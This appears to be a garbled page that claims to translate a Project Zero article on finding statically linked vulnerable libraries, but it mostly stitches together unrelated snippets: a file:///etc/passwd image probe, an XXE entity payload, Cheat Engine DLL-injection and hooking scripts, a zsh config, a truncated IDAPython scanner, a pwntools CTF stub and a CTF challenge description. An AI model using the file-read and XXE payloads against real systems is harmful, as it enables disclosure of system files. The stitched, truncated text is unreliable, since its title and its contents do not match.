Translation: Project Zero: Searching statically-linked vulnerable library functions in executable code
Files into which a vulnerable library has been statically linked are hard to detect at the binary level, because the library code is merged into the executable rather than referenced as a separate module.
This article presents the results of statically analysing binary files to detect vulnerable open-source libraries embedded in them.
```html
<img src="file:///etc/passwd">
```
```
[ENABLE]
loadlibrary(luaclient-i386.dll)
luacall(openLuaServer('CELUASERVER'))
globalalloc(luainit, 128)
globalalloc(LuaFunctionCall, 128)
label(luainit_exit)
globalalloc(luaserverinitialized, 4)
globalalloc(luaservername, 12)
luaservername:
```
```
[ENABLE]
//code from here to '[DISABLE]' will be used to enable the cheat
{$lua}
function hook(caller, p1)
  print(getNameFromAddress(caller), readString(p1))
end
{$asm}
loadlibrary(luaclient-i386.dll)
```
```xml
<!DOCTYPE scan [
<!ENTITY test SYSTEM "target.xml">
]><scan>&test;</scan>
```
```zsh
source ~/.antigen.zsh
antigen use oh-my-zsh
antigen theme tjkirch
antigen bundle zsh-users/zsh-autosuggestions
antigen bundle zsh-users/zsh-syntax-highlighting
antigen bundle djui/alias-tips
antigen bundle srijanshetty/zsh-pip-completion
antigen bundle zdharma/history-search-multi-word
antigen bundle autojump
```
```python
# IDAPython snippet: scans 0x10000 bytes from the cursor position
import struct
from idc import here, get_item_size
from idautils import XrefsFrom

start = here()
end = start + 0x10000
addr = start
while addr < end:
    #if len(list(XrefsFrom(addr, 0))) and get_item_size(addr) <= 8:
    #if get_item_size(addr) <= 8:
    try:
        s = ''
        for saddr in range(addr, addr+0x100, 2):
```
```python
from pwn import *
from base58 import *

context.bits = 64
# pwntools parses KEY=VALUE command-line arguments into `args`
REMOTE = int(bool(args.REMOTE))
encoded_user_pk = args.USER_PK
user_pk = b58decode(encoded_user_pk.encode())
target_pda_pk = b58decode(b'Ei3Ny8gV2uEtFKL8XzLMkQN5t3Rzhdy9apaAJxAoNAHT')
my_program_id = b58decode(b'osecio1111111111111111111111111111111111111')
```
This challenge provides the source code of a JIT compiler built on revmc, along with patches to the revm and anvil sources from foundry.
The goal is to read a flag string stored at memory address 0x13370000.
Below is the source code of libjit.so, the library that is loaded when the JIT runs inside anvil. Its load_flag() function executes when the library is loaded.
// https://github.com/fuzzland/blazctf-2024/blob/main/i-love-revmc/challenge/anvil-image/jit-compiler/c/linker.c#L54-L69